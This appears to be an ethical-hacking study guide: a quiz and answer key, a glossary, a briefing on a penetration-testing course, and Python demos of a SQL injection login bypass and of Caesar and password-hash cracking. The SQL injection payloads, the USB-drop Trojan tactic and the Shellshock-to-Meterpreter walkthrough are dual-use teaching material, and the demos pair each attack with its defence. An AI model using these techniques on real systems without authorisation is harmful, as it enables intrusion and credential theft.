Category: Ethical Hacking

    Ethical Hacking and Penetration Testing with Kali Linux

    The provided sources offer a comprehensive overview of cybersecurity in 2024. They explore foundational and advanced concepts crucial for aspiring cybersecurity professionals, including cryptography, risk management, security technologies, and ethical hacking methodologies. The texts detail various types of hackers, their motivations, and the ethical responsibilities of cybersecurity experts. Furthermore, the sources introduce essential tools like Nmap, Metasploit, and Wireshark, explaining their practical applications in vulnerability assessment and penetration testing. Finally, they discuss common cyber threats such as phishing, SQL injection, and cross-site scripting, alongside preventative measures and career paths in the cybersecurity field.

    Cybersecurity Fundamentals Study Guide

    Quiz

    1. Explain the concept of social engineering in the context of cybersecurity. Provide an example of a common social engineering tactic and why it is often successful.
    2. Describe the purpose of encryption in cybersecurity. Differentiate between symmetric and asymmetric encryption, highlighting a key advantage of each.
    3. What is a brute-force attack, and why can it be time-consuming? Briefly describe two other methods of cryptanalysis besides brute force.
    4. Explain the difference between a white hat hacker and a black hat hacker. What is the primary role of an ethical hacker within an organization?
    5. Outline the five phases of penetration testing. Which phase is considered the most crucial for a successful penetration test, and why?
    6. Define SQL injection and explain why it is a significant web application vulnerability. Provide a simple example of how an attacker might attempt an SQL injection.
    7. What is a Denial-of-Service (DoS) attack? How does a Distributed Denial-of-Service (DDoS) attack differ from a DoS attack, and why is it generally more challenging to mitigate?
    8. Explain what a botnet is and how it is typically created. What are botnets commonly used for in cyberattacks?
    9. Describe the main difference between a virus and a Trojan horse. Give one example of the negative impact each can have on a computer system.
    10. What is Wireshark, and why is it a valuable tool for network analysis in cybersecurity? Briefly explain what kind of information Wireshark allows a user to see.

    Quiz Answer Key

    1. Social engineering involves manipulating individuals into divulging confidential information or performing actions that compromise security. A common tactic is phishing, where fraudulent emails from seemingly trustworthy sources trick users into revealing passwords or clicking malicious links. This is often successful because it exploits human psychology, such as trust and urgency.
    2. Encryption transforms data into an unreadable format (ciphertext) to protect its confidentiality. Symmetric encryption uses the same key for encryption and decryption, offering speed. Asymmetric encryption uses separate public and private keys, simplifying secure key exchange.
    3. A brute-force attack involves trying every possible key combination to decrypt data, which can take a significant amount of time due to the vast number of potential keys. Two other cryptanalysis methods are dictionary attacks (using a list of common passwords) and rainbow table attacks (using pre-computed hash values).
    4. A white hat hacker (ethical hacker) works to find security vulnerabilities in systems with permission to improve security, while a black hat hacker exploits vulnerabilities for malicious purposes. The primary role of an ethical hacker is to identify weaknesses and recommend solutions to protect an organization’s assets.
    5. The five phases of penetration testing are reconnaissance (information gathering), scanning, exploitation, post-exploitation, and reporting. Reconnaissance is considered the most crucial because the quality and breadth of information gathered directly impact the effectiveness of subsequent phases by informing the choice of tools and attack vectors.
    6. SQL injection is a vulnerability that allows attackers to insert malicious SQL code into an application’s database queries. It’s significant because it can lead to data breaches, unauthorized access, and data manipulation. An attacker might try entering `' OR '1'='1` into a username field to bypass authentication.
    7. A Denial-of-Service (DoS) attack aims to disrupt a service by overwhelming it with traffic from a single source, making it unavailable to legitimate users. A Distributed Denial-of-Service (DDoS) attack uses numerous compromised devices (bots) to flood the target, making it harder to block the attack source and increasing the volume of malicious traffic.
    8. A botnet is a network of compromised devices (bots) infected with malware and controlled remotely by a single attacker (bot herder). Botnets are typically created by exploiting vulnerabilities or using social engineering to spread malware. They are commonly used for DDoS attacks, spam distribution, and data theft.
    9. A virus is a malicious code that attaches itself to a host program and replicates by spreading to other programs, often causing system damage or data corruption. A Trojan horse disguises itself as legitimate software but contains hidden malicious functionality, such as creating backdoors for unauthorized access or stealing data.
    10. Wireshark is a network protocol analyzer that captures network packets in real time and displays them in a human-readable format. It is valuable for cybersecurity as it allows users to examine network traffic, identify security issues, troubleshoot network problems, and understand communication protocols at a detailed level, including source and destination IPs, protocols used, and data content.
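As an added example (not code from the study guide or its sources), the bypass described in answer 6 is run against an in-memory SQLite table next to the parameterised query that prevents it; the accounts, the table and the `demo` helper are constructed here for the demonstration.

```python
"""Added example, not code from the study guide: the authentication bypass the
answer key describes, run against an in-memory SQLite table, beside the
parameterised query that prevents it. Users, passwords and the table are
constructed here for the demo."""
import sqlite3

# Constructed sample accounts. Plaintext password storage is itself bad
# practice; it is used here only to keep the injection demonstration short.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# The injection string quoted in the answer key above.
PAYLOAD = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def render_vulnerable_sql(username: str, password: str) -> str:
    """The query as a string-concatenating application would build it: user
    input is spliced straight into SQL syntax, so quotes in the input change
    the statement's structure instead of being treated as data."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    row = conn.execute(render_vulnerable_sql(username, password)).fetchone()
    return row is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the SQL text is fixed and the values travel to the
    driver separately, so the payload is compared literally against the stored
    username or password and never rewrites the WHERE clause."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


def demo() -> dict:
    conn = make_db()
    return {
        # Payload in the password field. The WHERE clause becomes
        #   username = 'nobody' AND password = '' OR '1'='1'
        # and because AND binds tighter than OR, that reads
        #   (username = 'nobody' AND password = '') OR TRUE
        # which matches every row: login succeeds for an account that does not exist.
        "vuln_payload_in_password": vulnerable_login(conn, "nobody", PAYLOAD),
        # Payload in the username field of this particular query shape:
        #   username = '' OR '1'='1' AND password = 'x'
        # parses as username = '' OR ('1'='1' AND password = 'x'), so it only
        # matches if some row's password is literally 'x'. Whether the answer
        # key's username-field attempt succeeds depends on how the query is
        # written; the defect is the string concatenation, not one magic input.
        "vuln_payload_in_username": vulnerable_login(conn, PAYLOAD, "x"),
        # The parameterised version treats the same payload as an ordinary,
        # non-matching password.
        "safe_payload_in_password": safe_login(conn, "nobody", PAYLOAD),
        "safe_valid_credentials": safe_login(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```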

    Essay Format Questions

    1. Discuss the evolving landscape of cyber threats and the increasing importance of ethical hacking in mitigating these risks. Provide specific examples of how ethical hacking methodologies can be applied to different types of cyber threats.
    2. Compare and contrast different types of social engineering attacks, analyzing the psychological principles that attackers exploit. Evaluate the effectiveness of various countermeasures that organizations and individuals can implement to defend against these attacks.
    3. Analyze the strengths and weaknesses of different encryption methods (symmetric vs. asymmetric) and cryptanalysis techniques. Discuss scenarios where specific encryption algorithms and cryptanalysis approaches are most effective or vulnerable.
    4. Evaluate the significance of penetration testing in an organization’s cybersecurity strategy. Discuss the different phases of a penetration test and the critical factors that contribute to its success in identifying and addressing vulnerabilities.
    5. Examine the technical mechanisms and impacts of Denial-of-Service and Distributed Denial-of-Service attacks. Discuss various strategies and technologies that organizations can employ to prevent and mitigate these types of attacks.

    Glossary of Key Terms

    • Academic Qualifications: Formal certifications and degrees obtained through educational institutions.
    • Algorithm: A step-by-step procedure or set of rules used to solve a problem or perform a computation.
    • Anonymization: The process of removing personally identifiable information from data to protect privacy.
    • Antivirus: Software designed to detect and remove malicious software (malware) like viruses and Trojans.
    • API Token: A unique identifier used to authenticate an application or user accessing an Application Programming Interface (API).
    • ARP Spoofing: A malicious technique where an attacker sends falsified Address Resolution Protocol (ARP) messages over a local area network.
    • Authentication: The process of verifying the identity of a user, device, or process.
    • Authorization: The process of determining what actions a user, device, or process is permitted to perform.
    • Bash Script: A series of commands written in the Bash (Bourne-Again SHell) scripting language, used for automation in Linux and other Unix-like operating systems.
    • Black Hat Hacker: An individual who attempts to gain unauthorized access to computer systems or networks for malicious purposes.
    • Block Cipher: A type of symmetric encryption algorithm that encrypts data in fixed-size blocks.
    • Bot Herder: The individual who controls a botnet.
    • Botnet: A network of compromised computers or devices (bots) controlled remotely by an attacker to perform malicious tasks.
    • Brute Force Attack: A cryptanalysis technique that involves trying every possible key or password until the correct one is found.
    • Buffer Overrun: A vulnerability that occurs when a program writes more data to a buffer than it is allocated to hold, potentially overwriting adjacent memory.
    • Burp Suite: A popular integrated platform used for web application security testing.
    • Caesar Cipher: A simple substitution cipher where each letter in the plaintext is shifted a certain number of places down the alphabet.
    • Capturing Data: The act of intercepting and recording network traffic or other digital information.
    • Certified Ethical Hacker (CEH): An individual who has the skills and knowledge to look for weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner.
    • Cipher: The result of encrypting plaintext; also refers to a method of encryption.
    • Ciphertext: Data that has been encrypted and is unreadable without the correct decryption key.
    • Command Line Interface (CLI): A text-based interface used to interact with an operating system or application by typing commands.
    • Content Delivery Network (CDN): A geographically distributed network of proxy servers and their data centers.
    • Cryptography: The art and science of concealing information to make it unreadable to unauthorized individuals.
    • Cryptanalysis: The art of breaking codes and ciphers; analyzing cryptographic systems to reveal hidden information.
    • Cyber Attack: A malicious attempt to gain unauthorized access to a computer system, network, or digital information, typically to disrupt operations, steal data, or cause other harm.
    • Cyber Security: The practice of protecting computer systems, networks, and digital information from theft, damage, disruption, or unauthorized access.
    • Data Breach: A security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual unauthorized to do so.
    • Data Encryption Standard (DES): A symmetric-key algorithm for encrypting digital data.
    • Decryption: The process of converting ciphertext back into its original plaintext using the correct key.
    • Deep Web: Parts of the World Wide Web whose contents are not indexed by standard search engines.
    • Denial of Service (DoS) Attack: An attack that aims to make a computer resource unavailable to its intended users.
    • Dictionary Attack: A cryptanalysis technique that tries to crack passwords by testing words from a dictionary.
    • Digital Signature: A mathematical technique used to validate the authenticity and integrity of a message or document.
    • Distributed Denial of Service (DDoS) Attack: A type of DoS attack where the malicious traffic originates from multiple compromised devices.
    • DNS Enumeration: The process of locating DNS servers and records for a specific domain.
    • Email Spoofing: The forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.
    • Enigma: A famous cryptographic cipher device used by Nazi Germany during World War II.
    • Encryption: The process of converting data into an unreadable format (ciphertext) to protect its confidentiality.
    • Exploit: A piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability to cause unintended or unanticipated behavior on computer software, hardware, or something electronic.
    • Firewall: A network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
    • Fishing (Phishing): A type of social engineering attack where attackers send fraudulent messages designed to trick individuals into revealing sensitive information. (The source transcript renders “phishing” as “fishing”.)
    • Forensic Analysis: The process of examining digital evidence to understand security incidents and gather information for legal or investigative purposes.
    • Hash Function: A mathematical function that converts an input of arbitrary size into an output of a fixed size (the hash value).
    • Hash Value: The output of a hash function; often used to verify data integrity.
    • Hping3: A command-line oriented TCP/IP packet generator and analyzer.
    • HTTPS: A secure version of the HTTP protocol that uses encryption for secure communication over the internet.
    • Hypertext Markup Language (HTML): The standard markup language for creating web pages.
    • Incident Response: The process of handling and managing the aftermath of a security incident.
    • Initialization Vector (IV): A block of bits used in cryptographic algorithms to randomize the encryption and decryption process.
    • Internet Protocol (IP) Address: A numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication.
    • John the Ripper: A popular open-source password security auditing and password recovery tool.
    • Kali Linux: A Debian-based Linux distribution designed for digital forensics and penetration testing.
    • Key: A piece of information used in cryptography to encrypt or decrypt data.
    • Key Generation: The process of creating cryptographic keys.
    • Localhost (LHOST): The IP address of the local computer (typically 127.0.0.1).
    • Macro Virus: A computer virus written in a macro language embedded in a software application.
    • Malicious Hackers (Black Hats): Individuals who exploit vulnerabilities in computer systems or networks for unauthorized or harmful purposes.
    • Malware: Software that is intended to damage or disable computers and computer systems.
    • Man-in-the-Middle (MITM) Attack: An attack where the attacker secretly relays and potentially alters the communications between two parties who believe they are communicating directly with each other.
    • Master Boot Record (MBR): The first sector of a storage device that contains code to boot the operating system.
    • Metasploit: A penetration testing framework that contains a collection of exploits and tools.
    • Network Architecture: The design and structure of a computer network, including its components and their interactions.
    • Network Packet: A small unit of data transmitted over a network.
    • Nikto: An open-source web server scanner that performs comprehensive tests against web servers for multiple types of vulnerabilities.
    • OWASP Broken Web Applications Project: A collection of intentionally vulnerable web applications used for security testing and training.
    • Onion Links: Special URLs used to access hidden services on the Tor network.
    • OpenVAS (Greenbone Vulnerability Manager): A comprehensive vulnerability management system.
    • Operating System (OS): The software that supports a computer’s basic functions, such as scheduling tasks, executing applications, and controlling peripherals.
    • Packet Filtering Firewall: A firewall that controls network access by examining the source and destination addresses, protocols, and ports of network packets.
    • Password Cracking: The process of attempting to recover passwords from stored or transmitted data.
    • Password Policies: A set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly.
    • Penetration Testing: A simulated cyberattack performed on a computer system or network to evaluate its security.
    • Payload: The part of an exploit that performs the intended malicious action.
    • Peer-to-Peer (P2P) Model: A decentralized communication model where each node can act as both a client and a server.
    • Phishing: See Fishing.
    • Plaintext: Unencrypted data.
    • Port (Networking): A communication endpoint in a computer’s operating system associated with a specific service or application.
    • Proxy Chains: A tool that forces any TCP connection made by any given application to follow a chain of proxies.
    • Proxy Firewall: A firewall that acts as an intermediary between a network and the internet, handling requests on behalf of client systems.
    • Public Key: A cryptographic key that can be shared with others and is used for encryption or verifying digital signatures.
    • Rainbow Table Attack: A cryptanalysis technique that uses pre-computed tables of hash values to crack passwords.
    • Ransomware: A type of malware that encrypts a victim’s files and demands a ransom payment to restore access.
    • Reconnaissance: The initial phase of a penetration test or attack where information about the target is gathered.
    • Reverse Engineering: The process of analyzing a hardware or software system to understand its design and functionality.
    • Reverse TCP Connection: A type of network connection where the target machine initiates the connection back to the attacker’s machine.
    • Risk Assessment: The process of identifying, analyzing, and evaluating potential risks.
    • Root Access: The highest level of access control in Unix-like operating systems.
    • Router: A networking device that forwards data packets between computer networks.
    • RSA: A public-key cryptosystem that is widely used for secure data transmission.
    • Scanning (Penetration Testing): The phase of a penetration test where tools are used to identify open ports, services, and vulnerabilities on the target system.
    • Security Auditing: A systematic evaluation of the security of an organization’s information systems.
    • Server Message Block (SMB): A network file-sharing protocol.
    • Shell: A command-line interpreter that provides an interface to the operating system.
    • Shellcode: A small piece of code used as the payload in the exploitation of software vulnerabilities.
    • Simply Learn: (In the context of the source) An educational platform or website.
    • Sniffing: The process of monitoring and capturing network traffic.
    • Social Engineering: The manipulation of individuals to perform actions or divulge confidential information.
    • SQL (Structured Query Language): A domain-specific language used in programming and designed for managing data held in a relational database management system.
    • SQL Injection: A code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
    • SSL Handshake: The process that initiates a secure communication session between a client and a server using the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocol.
    • Stateful Inspection Firewall: A firewall that keeps track of the state of network connections and makes decisions based on the context of these connections.
    • Subdomain: A domain that is part of a larger domain.
    • Substitution Cipher: A method of encryption by which units of plaintext are replaced with ciphertext according to a regular system.
    • Sudo: A program that allows a permitted user to execute a command as the superuser or another user, as specified by the security policy.
    • Superuser: A user with administrative privileges (e.g., root in Linux).
    • Symmetric Encryption: An encryption method in which the same key is used for both encryption and decryption.
    • SYN Packet: A type of TCP packet used to initiate a connection.
    • Target URI: The specific Uniform Resource Identifier (path) on a server that is being targeted by an attack.
    • TCP/IP: The suite of communication protocols used to interconnect network devices on the Internet.
    • Tor Browser: A web browser designed for anonymity and privacy, using the Tor network.
    • Trojan Horse: A type of malware that appears to be legitimate software but performs malicious actions when run.
    • Uncertified Websites: Websites that do not have valid security certificates, potentially indicating a risk.
    • Vulnerability: A weakness in a system that can be exploited by a threat.
    • Vulnerability Assessment: The process of identifying and quantifying security vulnerabilities in a system.
    • Vulnerability Scanner: An automated tool used to identify potential vulnerabilities in computer systems and networks.
    • VPN (Virtual Private Network): A network that extends a private network across a public network, and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.
    • Web Server: A computer system that serves web pages and related content to clients.
    • White Hat Hacker (Ethical Hacker): A security expert who uses hacking skills to identify security vulnerabilities in systems with the permission of the owner, with the goal of improving security.
    • Wi-Fi Hacking Tools: Software and techniques used to exploit vulnerabilities in wireless networks.
    • Wireshark: A free and open-source packet analyzer used for network troubleshooting and analysis.
    • WPScan: A free, non-commercial vulnerability scanner for WordPress websites.
    • Zenmap: The official Nmap Security Scanner GUI.

    Detailed Briefing Document: Review of Cyber Security and Ethical Hacking Concepts

    Introduction:

    This briefing document summarizes the main themes, important ideas, and facts presented in the provided source material (“01.pdf”). The document covers a range of cybersecurity topics, from social engineering attacks and cryptography to ethical hacking methodologies, network security measures, malware, and practical demonstrations of penetration testing using tools like Kali Linux. Quotes from the original source are included to highlight key concepts.

    1. Social Engineering Attacks:

    The source emphasizes the human element as a significant vulnerability in security. Attackers often exploit natural human tendencies like curiosity and greed to gain access to systems or information.

    • Exploiting Trust: Attackers may pose as legitimate entities to elicit sensitive information. “If a person can interact with you, let’s say they’re trying to take a survey and they approach you for feedback on a particular product that you have been utilizing, and they ask you these questions, you wouldn’t think twice before giving those answers. As long as the request sounds legitimate to us, we are able to justify that request; we do answer those queries. So it’s upon us to verify the authenticity of the request coming in before we answer it.”
    • Phishing: This involves fraudulent emails appearing to come from trusted sources. “Phishing, as discussed, would be fraudulent emails which appear to be coming from a trusted source, so email spoofing comes to mind, fake websites, and so on and so forth.”
    • Exploiting Curiosity: Leaving infected devices like USB drives in public places can lure unsuspecting individuals. “There are so many physical attacks where hackers just keep pen drives lying around in a parking lot. Now this is an open, generic attack: whoever falls victim will fall victim. So if I just throw around a few USBs in the parking lot, obviously with Trojans implemented on them, some people who are curious or who are looking for a couple of freebies might take up those pen drives, plug them in their computers to see what data is on the pen drives. At the same time, once they plug those pen drives into their computers, the virus or the Trojan would get infected and cause harm to their machine.”
    • Exploiting Greed: Scams like Nigerian frauds and fake lotteries prey on individuals’ desire for quick financial gain. “Exploiting human greed: we just talked about the Nigerian frauds and the lotteries, those kinds of attacks, the fake money-making gimmicks. Now basically this is where you prey upon the person’s greed kicking in, and they click on those links in order to get that money that has been promised to them in that email.”

    2. Cryptography:

    Encryption is presented as a fundamental mechanism for data privacy and security.

    • Encryption Process: Cryptography involves scrambling data using algorithms to make it unreadable without the correct key. “One of the safest mechanisms to keep data private and to keep yourself secure is using encryption. Now encryption can happen through cryptography. What is cryptography? Cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user; the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data. So we’re just making it unreadable, or non-readable, by using a particular key or a particular algorithm, and then we’re going to send the key to the end user. The end user, using the same key, would then decrypt that data. If anybody compromises that data while it is being sent over the network, since it is encrypted, they would not be able to read it.”
    • Cipher and Decryption: Encrypted data is called a cipher. Decryption is the reverse process using the key. The source illustrates a simple substitution cipher with a shift of three. “The encrypted message is also known as a cipher. The decryption is just the other way around, where you know the key now and you can figure out what that E corresponds to by going back three characters in the alphabet.”
    • Cryptanalysis: This is the process of decrypting a message without knowing the secret key. “Decryption without the use of a secret key, that is known as cryptanalysis. Cryptanalysis is the reversing of an algorithm to figure out what the decryption was without using a key.”
    • Cryptanalysis Techniques: The source mentions three common techniques:
      • Brute Force Attack: Trying every possible key combination. “A brute force attack is trying every combination, permutation and combination, of the key to figure out what the key was. It is 100% successful but may take a lot of time.”
      • Dictionary Attack: Using a list of potential keys (words). “A dictionary attack is where you have created a list of possible encryption mechanisms, a list of possible cracks, and then you try to figure out whether those cracks work or not.”
      • Rainbow Table Attack: Comparing encrypted text with pre-computed tables of hashes. “Rainbow tables are where you have an encrypted text in hand and you’re trying to figure out the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place.”
    • Spam Mimic: The source demonstrates a tool that encodes messages into seemingly unrelated spam emails for obfuscation. “To begin with the demo of cryptography, we are on a website called spammimic.com, which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand. So if I say I want to encode a message, turn a short message into spam: what this does is, you want to send across a secret message, you type in the secret message, a short one, and it will convert that into a spam mail. You send it across, so whoever is reading that spam mail would never get an idea of the embedded message within it.”
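As an added example (not code from the study guide or the source video), the shift-by-three substitution cipher the briefing describes, recovered without the key by exhaustive search, followed by the difference between a dictionary attack (hash each guess on demand) and a rainbow-table-style precomputed lookup; the message, the wordlist, the candidate passwords and the salt used for the defender’s check are all constructed here.

```python
"""Added example, not code from the study guide or its source video: the
shift-by-three substitution cipher the briefing describes, recovered by
exhaustive key search, and the difference between a dictionary attack (hash
each guess on demand) and a rainbow-table-style lookup (hash the guesses once
up front). All messages, passwords and the wordlist are constructed here."""
import hashlib
import string

ALPHABET = string.ascii_uppercase


def caesar_encrypt(plaintext: str, shift: int) -> str:
    """Shift every letter `shift` places down the alphabet (3 in the source's example)."""
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)  # spaces and punctuation pass through unchanged
    return "".join(out)


def caesar_decrypt(ciphertext: str, shift: int) -> str:
    """Decryption with the key is 'the other way around': shift back."""
    return caesar_encrypt(ciphertext, -shift)


# Constructed mini wordlist used to judge whether a candidate plaintext reads as English.
COMMON_WORDS = {"THE", "MEET", "ME", "AT", "DAWN", "AND", "IS", "ATTACK", "ON"}


def english_score(text: str) -> int:
    return sum(1 for w in text.split() if w in COMMON_WORDS)


def brute_force_caesar(ciphertext: str):
    """Cryptanalysis without the key: try all 25 non-identity shifts and keep the
    candidate that looks most like English. The right answer is guaranteed to be
    among the candidates because the key space is exhausted; it is cheap here
    only because that key space is tiny."""
    best_shift = max(range(1, 26),
                     key=lambda s: english_score(caesar_decrypt(ciphertext, s)))
    return best_shift, caesar_decrypt(ciphertext, best_shift)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


# Constructed candidate list standing in for a password dictionary.
GUESSES = ["password", "letmein", "welcome1", "kali2024", "Summer2024!"]


def dictionary_attack(target_hash: str, guesses=GUESSES):
    """Hash each guess on demand and compare; the work is repeated for every target."""
    for g in guesses:
        if sha256_hex(g) == target_hash:
            return g
    return None


def build_lookup_table(guesses=GUESSES) -> dict:
    """Precompute hash -> guess once. Real rainbow tables compress this with hash
    chains, but the trade-off is the same: pay up front, then each lookup is O(1)."""
    return {sha256_hex(g): g for g in guesses}


def table_lookup(target_hash: str, table: dict):
    return table.get(target_hash)


def salted_hash(password: str, salt: str) -> str:
    """Defender's check (an assumption added here, not discussed in the source):
    a per-user salt makes a table built from bare guesses useless, because the
    stored hash no longer depends on the password alone."""
    return sha256_hex(salt + password)


def demo() -> dict:
    ct = caesar_encrypt("Meet me at dawn", 3)  # "PHHW PH DW GDZQ"
    shift, pt = brute_force_caesar(ct)
    table = build_lookup_table()
    stored = sha256_hex("kali2024")
    return {
        "ciphertext": ct,
        "recovered_shift": shift,
        "recovered_plaintext": pt,
        "dictionary_hit": dictionary_attack(stored),
        "table_hit": table_lookup(stored, table),
        "salted_table_hit": table_lookup(salted_hash("kali2024", "u7x!"), table),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```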

    3. Ethical Hacking:

    The source differentiates between ethical and malicious hackers and outlines the responsibilities of an ethical hacker.

    • White Hat vs. Black Hat: Security experts who work defensively are “white hat hackers,” while malicious attackers are “black hats.” “…vulnerabilities, and we report them back to the victim or to the client and help them patch those vulnerabilities. That’s the main difference between a white hat and a black hat: security experts are normally termed as white hat hackers; malicious hackers are termed as black hats.”
    • Responsibilities of an Ethical Hacker: These include:
      • Identifying and testing vulnerabilities. “First and foremost, you have to create scripts, test for vulnerabilities; first you have to identify those in the first place. So there’s a vulnerability assessment, identifying those vulnerabilities, and then you’re going to test them to see the validity and the complexity of those vulnerabilities.”
      • Developing security tools and configurations. “One of your responsibilities would be to develop tools to increase security as well, or to configure security in such a way that it would be difficult to breach.”
      • Performing risk assessments. “Performing risk assessment: now what is a risk? Risk is a threat that is posed to an organization by a possibility of getting hacked… I do a risk assessment to identify which vulnerability is critical, would have the most impact on the client, and what would be the repercussions if those vulnerabilities actually get exploited.”
      • Setting up security policies. “Another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data.”
      • Training staff on network security. “And finally, train the staff for network security. So we’ve got a lot of employees in an organization; we need to train the staff on what is allowed and what is not allowed, how to keep themselves secure so that they don’t get compromised, thus becoming a vulnerability themselves to the organization.”
      • Implementing administrative policies like password policies. “The policies that we have talked about are administrative policies to govern the employees of the organization, for example password policies. Most of the organizations will have a tough password policy where they say you have to create a password that meets a certain level of complexity before that can be accepted, and till you create that password you’re not allowed to log in or you’re not allowed to register.”

    4. Penetration Testing:

    Penetration testing is a focused effort to exploit identified vulnerabilities in information systems.

    • Vulnerability Assessment as a Precursor: It involves scanning for potential flaws before attempting penetration. “Now for penetration testing there is a phase called vulnerability assessment that happens before this. Vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization.”
    • Focus on Exploitation: Penetration testing aims to actively breach security defenses. “This is the part of ethical hacking where it specifically focuses on penetration only of the information systems… the essence of penetration testing is to penetrate information systems using various attacks.”
    • Attack Vectors: These can include phishing, password cracking, Denial of Service (DoS), and exploiting other identified vulnerabilities. “The attacks could be anything like a phishing attack, a password cracking attack, a denial of service attack, or any other vulnerabilities that you have identified during the vulnerability scan.”

    5. Kali Linux:

    Kali Linux is highlighted as a popular operating system for both ethical and malicious hackers due to its pre-installed security tools.

    • Tool-Rich Distribution: It contains over 600 tools for penetration testing and security auditing. “What is Kali Linux and why is it used? Kali Linux is an operating system often used by hackers and ethical hackers both, because of the tool sets that the operating system contains. It is an operating system created by professionals with a lot of embedded tools. It is a Debian-based operating system with advanced penetration testing and security auditing features. There are more than 600-plus odd tools on that operating system that can help you leverage any of the attacks.”
    • Versatile Capabilities: These tools support various security tasks like man-in-the-middle attacks, sniffing, password cracking, computer forensics, reverse engineering, and information gathering. “…contains, like I said, hundreds of tools that are used for various information security tasks like computer forensics, reverse engineering, information finding, even getting access to different machines and then creating viruses, worms, anything that you will… 600-plus tools in the Kali Linux operating system.”
    • Key Features: Kali Linux is open-source, free, regularly updated, customizable, supports wireless network cards and multiple languages, and allows for creating custom attacking scripts and exploits.

    6. Phases of Penetration Testing:

    The source outlines five key phases of a penetration test:

    • Reconnaissance (Information Gathering): This crucial phase involves collecting as much information as possible about the target. “the first one is the reconnaissance phase also known as the information gathering phase this is the most important phase for any hacker this is where the hacker or the ethical hacker if you will will gather as much information about the target, or vice versa the victim, right… for example you want to find out the IP addresses the domains subdomains the network architecture that is being utilized you want to identify operating systems that are being utilized.”
    • Scanning: Using tools to identify open ports, services, and potential vulnerabilities based on the information gathered. “the second phase is the scanning phase once you have gathered enough information about the target you would then start probing the network or the devices that are within the scope of your test to identify open ports what services are running on those ports what operating systems and versions are being utilized by those machines.”
    • Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system. “the third phase is gaining access based on the information gathered in the first two phases and the vulnerabilities that you have identified in the second phase you would then try to exploit those vulnerabilities to gain access to the system or the application this could involve using various techniques such as exploiting software flaws, weak passwords, or social engineering tactics.”
    • Maintaining Access (Post-Exploitation): Once access is gained, the focus shifts to maintaining that access and potentially escalating privileges. “the fourth phase is maintaining access once you have gained access to a system or an application you would want to maintain that access for a certain period of time to gather more information or to perform further actions this could involve installing back doors, creating new accounts, or pivoting to other systems within the network.”
    • Reporting: Documenting the findings, vulnerabilities exploited, and recommendations for remediation. “the final phase is reporting once the penetration test is complete you would document all of your findings, the vulnerabilities that you have exploited, the impact of those vulnerabilities, and your recommendations for remediation this report is then provided to the client to help them improve their security posture.”

    7. Vulnerability Assessment Examples:

    The source provides demonstrations of common vulnerabilities:

    • SQL Injection: This attack exploits vulnerabilities in how web applications handle user input to interact with databases. By injecting malicious SQL code, an attacker can bypass authentication or extract sensitive data. The demonstration shows how a simple SQL injection can bypass a login form (“single quote or 1= 1 space – space”) and how a different injection can dump database contents in a user lookup form (“single quote or 1= 1 space”). The source emphasizes that “the vulnerability will always lie in the application it is the developer’s prerogative of how to develop the application how to configure it to prevent SQL injection queries from happening.” Different types of SQL injection are mentioned: in-band (error-based, union-based), blind (boolean-based, time-based), and out-of-band.
    • Password Cracking: The demonstration uses the Cain & Abel tool on a Windows 7 machine to extract password hashes and attempts to crack them using a brute-force attack. It highlights how Windows stores password hashes and the time-consuming nature of brute-force attacks.
    • Shellshock Vulnerability: The source demonstrates exploiting the Shellshock vulnerability on a Linux web server using Kali Linux and Metasploit. This involves using reconnaissance tools like Zenmap and Sparta to identify the target and the vulnerability, and then using Metasploit to execute a payload and gain remote access (“meterpreter session”).

    8. Network Security Measures:

    The document touches upon several network security technologies:

    • VPN (Virtual Private Network): VPNs encrypt internet traffic and mask the user’s IP address, enhancing privacy and security, especially on public Wi-Fi. The example of Jude at the airport illustrates the risks of using public Wi-Fi without a VPN, where a hacker could intercept her bank transaction details. “bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network.” The process involves the user’s computer connecting to the ISP, then to the VPN server (which encrypts the data and provides a new IP address), and finally to the target server.
    • Tor (The Onion Router): Tor is presented as a network that anonymizes internet traffic by routing it through multiple relays. It hides the user’s IP address and location. The demonstration shows how to use the Tor Browser, check the apparent IP address and location, and access “.onion” websites (hidden services). “the Tor browser is a very effective way of anonymizing your internet activity it works by routing your traffic through multiple relays across the world encrypting it at each step and making it very difficult to trace your original IP address or your location.”
